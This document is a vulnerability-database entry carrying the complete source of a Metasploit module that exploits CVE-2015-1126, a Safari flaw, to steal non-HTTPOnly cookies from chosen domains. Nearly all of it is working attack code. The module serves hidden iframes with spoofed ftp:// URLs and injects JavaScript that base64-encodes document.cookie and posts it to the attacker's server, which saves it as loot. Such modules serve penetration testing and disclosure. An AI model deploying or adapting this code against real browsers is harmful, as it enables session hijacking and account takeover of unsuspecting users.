Lucene search

Jouko Pynnonen, joev <[email protected]>MSF:AUXILIARY-GATHER-APPLE_SAFARI_FTP_URL_COOKIE_THEFT-

HistoryApr 19, 2015 - 4:32 p.m.

Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft

2015-04-1916:32:37

Jouko Pynnonen, joev <[email protected]>

www.rapid7.com

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

AI Score

7.1

Confidence

High

JSON

A vulnerability exists in versions of OSX, iOS, and Windows Safari released before April 8, 2015 that allows the non-HTTPOnly cookies of any domain to be stolen.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::FtpServer
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft',
      'Description' => %q{
        A vulnerability exists in versions of OSX, iOS, and Windows Safari released
        before April 8, 2015 that allows the non-HTTPOnly cookies of any
        domain to be stolen.
      },
      'License'     => MSF_LICENSE,
      'Author'      => [
        'Jouko Pynnonen', # Initial discovery and disclosure
        'joev',           # msf module
      ],
      'References'  => [
        [ 'CVE', '2015-1126' ],
        [ 'URL', 'https://seclists.org/fulldisclosure/2015/Apr/30' ]
      ],
      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
      'PassiveActions' => [ 'WebServer' ],
      'DefaultAction'  => 'WebServer',
      'DisclosureDate' => '2015-04-08'
    ))

    register_options([
      OptString.new('URIPATH', [false, 'The URI to use for this exploit (default is random)']),
      OptPort.new('SRVPORT',   [true, 'The local port to use for the FTP server', 5555 ]),
      OptPort.new('HTTPPORT',  [true, 'The HTTP server port', 8080]),
      OptString.new('TARGET_DOMAINS', [
        true,
        'The comma-separated list of domains to steal non-HTTPOnly cookies from.',
        'apple.com,example.com'
      ])
    ])
  end


  #
  # Start the FTP and HTTP server
  #
  def run
    start_service
    print_status("Local FTP: #{lookup_lhost}:#{datastore['SRVPORT']}")
    start_http
    @http_service.wait
  end


  #
  # Handle the HTTP request and return a response.  Code borrowed from:
  # msf/core/exploit/http/server.rb
  #
  def start_http(opts={})
    # Ensture all dependencies are present before initializing HTTP
    use_zlib

    comm = datastore['ListenerComm']
    if comm.to_s == 'local'
      comm = ::Rex::Socket::Comm::Local
    else
      comm = nil
    end

    # Default the server host / port
    opts = {
      'ServerHost' => datastore['SRVHOST'],
      'ServerPort' => datastore['HTTPPORT'],
      'Comm'       => comm
    }.update(opts)

    # Start a new HTTP server
    @http_service = Rex::ServiceManager.start(
      Rex::Proto::Http::Server,
      opts['ServerPort'].to_i,
      opts['ServerHost'],
      datastore['SSL'],
      {
        'Msf'        => framework,
        'MsfExploit' => self,
      },
      opts['Comm'],
      datastore['SSLCert']
    )

    @http_service.server_name = datastore['HTTP::server_name']

    # Default the procedure of the URI to on_request_uri if one isn't
    # provided.
    uopts = {
      'Proc' => Proc.new { |cli, req|
          on_request_uri(cli, req)
        },
      'Path' => resource_uri
    }.update(opts['Uri'] || {})

    proto = (datastore['SSL'] ? 'https' : 'http')
    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")

    if opts['ServerHost'] == '0.0.0.0'
      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
    end

    # Add path to resource
    @service_path = uopts['Path']
    @http_service.add_resource(uopts['Path'], uopts)
  end

  #
  # Lookup the right address for the client
  #
  def lookup_lhost(c=nil)
    # Get the source address
    if datastore['SRVHOST'] == '0.0.0.0'
      Rex::Socket.source_address( c || '50.50.50.50')
    else
      datastore['SRVHOST']
    end
  end

  #
  # Handle the FTP RETR request. This is where we transfer our actual malicious payload
  #
  def on_client_command_retr(c, arg)
    conn = establish_data_connection(c)
    unless conn
      c.put("425 can't build data connection\r\n")
      return
    end

    print_status('Connection for file transfer accepted')
    c.put("150 Connection accepted\r\n")

    # Send out payload
    conn.put(exploit_html)
    c.put("226 Transfer complete.\r\n")
    conn.close
  end

  #
  # Kill HTTP/FTP (shut them down and clear resources)
  #
  def cleanup
    super

    # clear my resource, deregister ref, stop/close the HTTP socket
    begin
      @http_service.remove_resource(@uri_path)
      @http_service.deref
      @http_service.stop
      @http_service.close
      @http_service = nil
    rescue
    end
  end


  #
  # Ensures that gzip can be used.  If not, an exception is generated.  The
  # exception is only raised if the DisableGzip advanced option has not been
  # set.
  #
  def use_zlib
    unless Rex::Text.zlib_present? || !datastore['HTTP::compression']
      fail_with(Failure::Unknown, "zlib support was not detected, yet the HTTP::compression option was set.  Don't do that!")
    end
  end


  #
  # Returns the configured (or random, if not configured) URI path
  #
  def resource_uri
    return @uri_path if @uri_path

    @uri_path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))
    @uri_path = '/' + @uri_path if @uri_path !~ /^\//
    @uri_path
  end


  #
  # Handle HTTP requests and responses
  #
  def on_request_uri(cli, request)
    if request.method.downcase == 'post'
      json = JSON.parse(request.body)
      domain = json['domain']
      cookie = Rex::Text.decode_base64(json['p']).to_s
      if cookie.length == 0
        print_error("#{cli.peerhost}: No cookies found for #{domain}")
      else
        file = store_loot(
          "cookie_#{domain}", 'text/plain', cli.peerhost, cookie, 'cookie', 'Stolen cookies'
        )
        print_good("#{cli.peerhost}: Cookies stolen for #{domain} (#{cookie.bytes.length} bytes): ")
        print_good(file)
      end
      send_response(cli, 200, 'OK', '')
    else
      domains = datastore['TARGET_DOMAINS'].split(',')
      iframes = domains.map do |domain|
        %Q|<iframe style='position:fixed;top:-99999px;left:-99999px;height:0;width:0;'
                src='ftp://user%40#{lookup_lhost}%3A#{datastore['SRVPORT']}%2Findex.html%23@#{domain}/'>
        </iframe>|
      end

      html = <<-HTML
        <html>
        <body>
          #{iframes.join}
        </body>
        </html>
      HTML

      send_response(cli, 200, 'OK', html)
    end
  end

  #
  # Create an HTTP response and then send it
  #
  def send_response(cli, code, message='OK', html='')
    proto = Rex::Proto::Http::DefaultProtocol
    res = Rex::Proto::Http::Response.new(code, message, proto)
    res['Content-Type'] = 'text/html'
    res.body = html

    cli.send_response(res)
  end

  def exploit_html
    <<-HTML
    <html><body>
    <script>
    var p = window.btoa(document.cookie);
    var x = new XMLHttpRequest();
    x.open('POST', "http://#{lookup_lhost}:#{datastore['HTTPPORT']}#{resource_uri}")
    x.setRequestHeader('Content-type', 'text/plain');
    x.send(JSON.stringify({p: p, domain: document.domain}));
    </script>
    </body></html>
    HTML
  end

  def grab_key
    @grab_key ||= Rex::Text.rand_text_alphanumeric(8)
  end
end